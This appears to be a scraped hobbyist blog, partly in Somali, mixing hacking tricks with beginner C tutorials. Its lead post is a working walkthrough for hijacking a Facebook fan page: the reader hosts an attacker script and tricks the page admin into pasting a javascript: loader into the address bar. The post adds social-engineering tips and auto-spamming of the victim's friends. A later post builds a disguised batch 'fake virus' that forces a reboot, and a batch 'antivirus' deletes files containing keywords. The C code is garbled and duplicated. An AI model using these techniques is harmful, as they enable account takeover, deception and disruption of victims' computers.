hack whats up massege
Sunday, May 24, 2015
Google to Introduce New Photo-Sharing Platform to Kill Instagram
Facebook Password Hacking : How To Hack Admin Facebook Fan Page :D
Saturday, May 23, 2015
Hello fans! Many of my site visitors
asked me about how to hack Facebook fan page. As Facebook Fan Page is an
excellent platform for communication and for spreading our bussiness in
world, as a reason if which it has become the number one target of
hackers.
Today in this
article I am going to explain you how to hack Facebook fan page using
javascript. As we all know its difficult to hack Facebook fan page but
using this method you can hack Facebook fan page easily.
Now
lets start the tutorial of facebook fan page hacking . First of all we
will need to setup an exploit and a website to host that exploit. If
you already have a registed hosting account then its great otherwise
there are couple of free hosting websites that can be used for such
purposes like 000webhost.com etc.
Facebook Password Hacking : Steps To Hack Admin Facebook Fan Page
Step 1: First download Facebook page hacking exploit.
Password : www.wildhacker.com
Step 2: Now open the pagehack.js [in package] with notepad and search for nk@wildhacker.com and change nk@wildhacker.com with your facebook email.
Step 3: Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got!
and replace it with your own text. This text will be sent to the
facebook wall of 15 friends of the victim. Since it is an autoposting
bot, to prevent facebook from blocking it, I reduced its capacity to 15.
Now just save it as
anything.js (Tip: Be social engineer and rename it to something more
attractive like getprizes.js or booster.js) and then save it.
Step 4: Now
create a account on free hosting like 0fess.net or 000webhost.com (
110mb won t help this time)and upload facebook page hacking exploit on
your free hosting website. you will get url address something like this,
www.yoursite.com/pagehack.js
Step 5: Now ask victim to paste this in browser address bar, He must be admin of page, which you wants to hack:
javascript:(a = (b = document).createElement("script")).src = "http://www.yourwbesite.com/pagehack.js", b.body.appendChild(a); void(0)
Note : Change scr = http://www.yourwbesite.com/pagehack.js in javascript with your own address.
Tip: Tell him that it will make your page safe, or something else like attracting.
When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.
Enjoy, But don't hack for bad cause, I will not be responsible for any consequences made by you.
Thats it..
I
hope you will be able to hack any Facebook fan page after reading this
post.please do comment share and like this post if the information below
is helpful to you.
Enjoy hacking..........
ACCI CODE LETTERS A>>>>>>Z
#include<stdio.h>
#include<conio.h>
void main ()
{
char ch='a';
while(ch!='\r')
{
printf("Enter the letter you
want:\n");
ch=getch();
printf("%d\n");
printf("\The Chracter you
enter%c Is %d. \n" ,ch,ch);
}
getch();
}
If you get error let us know comment in the below section Thanks
#include<conio.h>
void main ()
{
char ch='a';
while(ch!='\r')
{
printf("Enter the letter you
want:\n");
ch=getch();
printf("%d\n");
printf("\The Chracter you
enter%c Is %d. \n" ,ch,ch);
}
getch();
}
If you get error let us know comment in the below section Thanks
C Programming Arrays
Sunday, May 10, 2015
In C programming, one of the frequently arising problem is to handle
similar types of data. For example: If the user want to store marks of
100 students. This can be done by creating 100 variable individually
but, this process is rather tedious and impracticable. These type of
problem can be handled in C programming using arrays.
An array is a sequence of data item of homogeneous value(same type).
Arrays are of two types:
An array is a sequence of data item of homogeneous value(same type).
Arrays are of two types:
- One-dimensional arrays
- Multidimensional arrays( will be discussed in next chapter )
Function declarator
Syntax of function declarator
return_type function_name(type(1) argument(1),....,type(n) argument(n))Syntax of function declaration and declarator are almost same except, there is no semicolon at the end of declarator and function declarator is followed by function body.
In above example,
int add(int a,int b) in line 12 is a function declarator.Function body
Function declarator is followed by body of function inside braces.Passing arguments to functions
In programming, argument(parameter) refers to data this is passed to function(function definition) while calling function.In above example two variable, num1 and num2 are passed to function during function call and these arguments are accepted by arguments a and b in function definition.
Arguments that are passed in function call and arguments that are accepted in function definition should have same data type. For example:
If argument num1 was of int type and num2 was of float type then, argument variable a should be of type int and b should be of type float,i.e., type of argument during function call and function definition should be same.
A function can be called with or without an argument.
Return Statement
Return statement is used for returning a value from function definition to calling function.Syntax of return statement
return (expression);For example:
return a; return (a+b);In above example, value of variable add in
add() function is returned and that value is stored in variable sum in main() function. The data type of expression in return statement should also match the return type of function.Example of user-defined function
/*Program to demonstrate the working of user defined function*/
#include <stdio.h>
int add(int a, int b); //function prototype(declaration)
int main(){
int num1,num2,sum;
printf("Enters two number to add\n");
scanf("%d %d",&num1,&num2);
sum=add(num1,num2); //function call
printf("sum=%d",sum);
return 0;
}
int add(int a,int b) //function declarator
{
/* Start of function definition. */
int add;
add=a+b;
return add; //return statement of function
/* End of function definition. */
}
Function prototype(declaration):
Every function in C programming should be declared before they are used. These type of declaration are also called function prototype. Function prototype gives compiler information about function name, type of arguments to be passed and return type.Syntax of function prototype
return_type function_name(type(1) argument(1),....,type(n) argument(n));In the above example,
int add(int a, int b); is a function prototype which provides following information to the compiler:- name of the function is
add() - return type of the function is
int. - two arguments of type
intare passed to function.
main() function.Function call
Control of the program cannot be transferred to user-defined function unless it is called invoked.Syntax of function call
function_name(argument(1),....argument(n));In the above example, function call is made using statement
add(num1,num2); from main(). This make the control of program jump from that statement to function definition and executes the codes inside that function.Function definition
Function definition contains programming codes to perform specific task.Syntax of function definition
return_type function_name(type(1) argument(1),..,type(n) argument(n))
{
//body of function
}
Function definition has two major components:Advantages of user defined functions
- User defined functions helps to decompose the large program into small segments which makes programmer easy to understand, maintain and debug.
- If repeated code occurs in a program. Function can be used to include those codes and execute when needed by calling that function.
- Programmer working on large project can divide the workload by making different functions.
User defined function
How user-defined function works in C Programming?
#include <stdio.h>
void function_name(){
................
................
}
int main(){
...........
...........
function_name();
...........
...........
}
C Programming Functions
In programming, a function is a segment that groups code to perform a specific task.
A C program has at least one function
Visit this page to learn more about library functions in C programming language
A C program has at least one function
main( ). Without main() function, there is technically no C program.Types of C functions
There are two types of functions in C programming:- Library function
- User defined function
Library function
Library functions are the in-built function in C programming system. For example:main()- The execution of every C program starts from this
main() function.printf()-
prinf() is used for displaying output in C.scanf()-
scanf() is used for taking input in C.Visit this page to learn more about library functions in C programming language
C Programming if, if..else and Nested if...else Statement
The
if, if...else and nested if...else
statement are used to make one-time decisions in C Programming, that
is, to execute some code/s and ignore some code/s depending upon the
test expression.C if Statement
if (test expression) {
statement/s to be executed if test expression is true;
}
The if statement checks whether the text expression
inside parenthesis () is true or not. If the test expression is true,
statement/s inside the body of if statement is executed but if test is false, statement/s inside body of if is ignored.Flowchart of if statement
Example 1: C if statement
Write a C program to print the number entered by user only if the number entered is negative.
#include <stdio.h>
int main(){
int num;
printf("Enter a number to check.\n");
scanf("%d",&num);
if(num<0) { /* checking whether number is less than 0 or not. */
printf("Number = %d\n",num);
}
/*If test condition is true, statement above will be executed, otherwise it will not be executed */
printf("The if statement in C programming is easy.");
return 0;
}
Example of while loop Write a C program to find the factorial of a number, where the number is entered by user. (Hints: factorial of n = 1*2*3*...*n
/*C program to demonstrate the working of while loop*/
#include <stdio.h>
int main(){
int number,factorial;
printf("Enter a number.\n");
scanf("%d",&number);
factorial=1;
while (number>0){ /* while loop continues util test condition number>0 is true */
factorial=factorial*number;
--number;
}
printf("Factorial=%d",factorial);
return 0;
}
OutputEnter a number. 5 Factorial=120
for loop example Write a program to find the sum of first n natural numbers where n is entered by user. Note: 1,2,3... are called natural numbers.
#include <stdio.h>
int main(){
int n, count, sum=0;
printf("Enter the value of n.\n");
scanf("%d",&n);
for(count=1;count<=n;++count) //for loop terminates if count>n
{
sum+=count; /* this statement is equivalent to sum=sum+count */
}
printf("Sum=%d",sum);
return 0;
}
int main(){
int n, count, sum=0;
printf("Enter the value of n.\n");
scanf("%d",&n);
for(count=1;count<=n;++count) //for loop terminates if count>n
{
sum+=count; /* this statement is equivalent to sum=sum+count */
}
printf("Sum=%d",sum);
return 0;
}
Find the sum of two one-dimensional arrays using Dynamic Memory Allocation
#include <stdio.h>
#include <alloc.h>
#include <stdlib.h>
void main()
{
int i,n;
int *a,*b,*c;
printf("How many Elements in each array...\n");
scanf("%d", &n);
a = (int *) malloc(n*sizeof(int));
b = (int *) malloc(n*sizeof(int));
c =( int *) malloc(n*sizeof(int));
printf("Enter Elements of First List\n");
for(i=0;i<n;i++)
{
scanf("%d",a+i);
}
printf("Enter Elements of Second List\n");
for(i=0;i<n;i++)
{
scanf("%d",b+i);
}
for(i=0;i<n;i++)
{
*(c+i) = *(a+i) + *(b+i);
}
printf("Resultant List is\n");
for(i=0;i<n;i++)
{
printf("%d\n",*(c+i));
}
}
sideebaa loosameeyaa Antvirus(HOW TO CREATE ANTIVIRUS)
Raac tusaalayaasha so socda
koobi dheh code kan kadibna Notepad ka fur Bast dheh
@echo off
color cb
title Batch Antivirus
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
del %a%.bat
echo %a%.bat was deleted....
pause >nul
)
)
)
)
pause >nul
kadiba sva garee idigoo isticmaalaya extationka (.bat) tusaale Antivirus.bat
kadib fur ama laba mar click sii muuska kheebtiisa bidix
koobi dheh code kan kadibna Notepad ka fur Bast dheh
@echo off
color cb
title Batch Antivirus
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
del %a%.bat
echo %a%.bat was deleted....
pause >nul
)
)
)
)
pause >nul
kadiba sva garee idigoo isticmaalaya extationka (.bat) tusaale Antivirus.bat
kadib fur ama laba mar click sii muuska kheebtiisa bidix
how to create facebook fake virus
Friday, May 8, 2015
Sidee ba loo abuuraa facebook virus
Facebook virus waa virus sahlan samentisa iyo isticmaalkiisa
Hadaba hadi aad danen jirtay in aad saaxiibadaa facebook aad ka yaabisid adigoo istaamalaya Hab cusub
Virus waa virus sahlan mana waxyeelaayo facebook saaxiibkaa/saaxiibada computer kiisa/keeda
Waxaa aan u baahanahnay waa Notepad oo computer wali oo ku jira Opreting Systemka Microsoft Window
Marka hore soo fur Notepad
Copy ama ku qor Notepadka code kan hosku qoran
Facebook virus waa virus sahlan samentisa iyo isticmaalkiisa
Hadaba hadi aad danen jirtay in aad saaxiibadaa facebook aad ka yaabisid adigoo istaamalaya Hab cusub
Virus waa virus sahlan mana waxyeelaayo facebook saaxiibkaa/saaxiibada computer kiisa/keeda
Waxaa aan u baahanahnay waa Notepad oo computer wali oo ku jira Opreting Systemka Microsoft Window
Marka hore soo fur Notepad
Copy ama ku qor Notepadka code kan hosku qoran
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5
MINUTES YOUR FACEBOOK ACCOUNT WILL BE
DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR
CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR
FACEBOOK ACCOUNT ARE NOW BEING
DELETED !!! PLEASE WAIT .........
Save garee Internet Explorer.bat waxaa waa jib ah in add isticmashid (.bat)
Right click ku kor dheh internet explorer.bat kadibna abuur shirt cut
Right click shortcut kadinba doro properts
Kadibna kasii dooro change icon kadib. Dooro sawirka internet explorer
Kadib delete file ki hore an samenay kadibna u dir sxbkaaga. Computerka sxbkaa 5 daqiiqo kadib waa oo is dami donaa
Comment & Share smile emoticon
this is fake virus
msg * WARNING VIRUS DETECTED!!!!! AFTER 5
MINUTES YOUR FACEBOOK ACCOUNT WILL BE
DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR
CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR
FACEBOOK ACCOUNT ARE NOW BEING
DELETED !!! PLEASE WAIT .........
Save garee Internet Explorer.bat waxaa waa jib ah in add isticmashid (.bat)
Right click ku kor dheh internet explorer.bat kadibna abuur shirt cut
Right click shortcut kadinba doro properts
Kadibna kasii dooro change icon kadib. Dooro sawirka internet explorer
Kadib delete file ki hore an samenay kadibna u dir sxbkaaga. Computerka sxbkaa 5 daqiiqo kadib waa oo is dami donaa
Comment & Share smile emoticon
- See more at: file:///C:/Users/Yuuuf/Downloads/109%20Best%20Run%20Commands%20List%20~%20Hacking%20Tricks.htm#sthash.gpqGPGsa.dpuf
Subscribe to:
Posts (Atom)



